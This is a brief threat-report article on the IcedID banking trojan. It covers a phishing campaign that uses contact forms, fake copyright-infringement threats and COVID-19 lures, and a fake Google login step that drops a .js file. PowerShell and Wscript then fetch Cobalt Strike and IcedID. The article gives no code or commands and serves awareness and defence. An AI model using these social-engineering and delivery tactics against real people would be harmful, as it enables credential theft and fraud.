The IcedID is a modular banking trojan that infects the device and deploys malware to access and steal financial information – including usernames and passwords – for online banking sessions. It uses multiple injection methods to bypass CAPTCHA protection.
The recent phishing campaign uses contact forms to evade detection, and floods companies with an immense number of phishing and spam messages. The threat amplifies as the malware can target the victim company’s secure email gateways and directly pop into the user’s primary inbox – whereas it would’ve landed into the target’s spam folder.
What’s more worrisome is that the attackers threaten and blackmail the victims with copyright infringement, further increasing their attack’s efficiency.
Another tactic used by the attackers is to use COVID-19 information and related health-themed emails to attract potential victims.
As the unwitting victims click on the links of evidence regarding their copyright infringement, they are asked to login via google. This is where a .js file is seamlessly downloaded onto their desktops, and the device becomes compromised. Powershell and Wscript are used to download the Cobalt Strike Beacon and IcedID payload. And this is where the malware penetrates the victim’s device.
The IcedID malware is region-specific as it targets users in Italy. Furthermore, the infected emails carry ZIP files and used “fake reply techniques” in European languages to increase their efficiency.